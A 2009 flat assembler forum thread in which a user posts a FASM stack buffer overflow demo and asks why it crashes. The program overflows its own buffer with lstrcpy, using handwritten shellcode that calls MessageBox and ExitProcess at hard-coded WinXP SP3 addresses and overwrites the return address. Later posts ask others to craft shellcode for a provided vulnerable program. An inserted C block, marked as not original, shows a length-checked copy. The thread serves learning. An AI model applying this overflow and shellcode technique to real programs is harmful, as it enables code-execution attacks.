flat assembler
Message board for the users of flat assembler.

Index > Windows > Stack overflow

eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 21 Jul 2009, 19:58
Hi,

When I was trying to understand the complexity of the stack operations I found a discussion on "stack overflow". I became very curious and tried to make my own stack overflow, using a little "shellcode" made by myself:

Code:
; buffer overflow test

format PE GUI 4.0
include '%fasminc%\win32a.inc'

section '.code' readable executable

entry $

        push 0
        push title
        push caption
        push 0
        call [MessageBox]

        call FillBuffer

        push 0
        push title
        push caption
        push 0
        call [MessageBox]

        push 0
        call [ExitProcess]

proc FillBuffer

        push ebp
        mov ebp, esp
        sub esp, 72
        push shellcode
        push esp
        call [lstrcpy]
        leave
        ret
endp

        title db 'BOF test', 0
        caption db 'Testing stack overflow', 0

shellcode:
        nop
        nop
        nop
        nop
        xor eax, eax
        push eax
        push eax
        push eax
        push eax
        mov eax, 7E3A07EAh ;MessageBox (WinXP sp3)
        call eax
;ERROR HERE
        mov eax, 7C81CB12h ;ExitProcess (WinXP sp3)
        call eax

        db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 70h, 0FFh, 06h, 00h ;0006FFA4

section '.idata' readable import

        library kernel32, 'KERNEL32.DLL', user32, 'USER32.DLL'
        import user32, MessageBox, 'MessageBoxA'
        import kernel32, lstrcpy, 'lstrcpy', ExitProcess, 'ExitProcess'


The problem is:

Debugging this program on OllyDbg, the program crashes when returning from call eax (MessageBox WinXP sp3). Please help me to understand why it crashes. Maybe MessageBox function destroys the "shellcode" but I didn't see that.

Thank you.
asmcoder



Joined: 02 Jun 2008
Posts: 784
asmcoder 21 Jul 2009, 22:20
[content deleted]


Last edited by asmcoder on 14 Aug 2009, 14:48; edited 1 time in total
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 22 Jul 2009, 11:51
asmcoder,

Thanks for the answer, but your code is not self-explanatory. I believe it works, but I can't understand why mine didn't work. Actually, your code just "jumps" to a predetermined code inside the program, I mean, your shellcode is not a real one (How would you inject a shellcode in a program for which you don't have the binary?). I used the (l)strcpy function, because it is mainly responsible for "stack overflow" in vulnerable programs (unix and win32).
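Added example, not part of the original posts or of any project code: the copy that FillBuffer performs, written in C with the length check that the unbounded lstrcpy call lacks. The 72-byte size is taken from the listing's `sub esp, 72`; the function names and the 'A'-filled test inputs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 72   /* size of the local reserved by `sub esp, 72` */

/* Length of src, scanning at most max bytes (portable strnlen). */
static size_t bounded_len(const char *src, size_t max)
{
    size_t n = 0;
    while (n < max && src[n] != '\0') n++;
    return n;
}

/* Hypothetical helper: copy src into dst only if it fits together with
 * its terminator. Returns 0 on success, -1 when the input is refused. */
static int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t len = bounded_len(src, dst_size);
    if (len >= dst_size) {        /* no room left for the NUL byte */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Checked counterpart of FillBuffer: same 72-byte stack local, but
 * oversized input is rejected instead of running past the buffer. */
int fill_buffer_checked(const char *input)
{
    char local[BUF_SIZE];
    return copy_checked(local, sizeof local, input);
}

/* Constructed input: a string of n 'A' bytes (n < 256). */
int try_len(size_t n)
{
    char src[256];
    if (n >= sizeof src) return -2;
    memset(src, 'A', n);
    src[n] = '\0';
    return fill_buffer_checked(src);
}

int main(void)
{
    printf("71: %d  72: %d  100: %d\n", try_len(71), try_len(72), try_len(100));
    return 0;
}
```

A 71-byte string is the longest input accepted, because the terminator needs the 72nd byte; anything longer is refused and the saved frame pointer and return address above the buffer are never touched.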
asmcoder



Joined: 02 Jun 2008
Posts: 784
asmcoder 22 Jul 2009, 20:23
[content deleted]


Last edited by asmcoder on 14 Aug 2009, 14:48; edited 1 time in total
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 23 Jul 2009, 00:06
asmcoder: Here we go. If you can, add some comments!


Description: This program just reads a certain file and shows its content in a MessageBox.
Filename: Shellme.rar
Filesize: 2.47 KB

eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 01 Aug 2009, 15:03
Can anyone do that?
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.
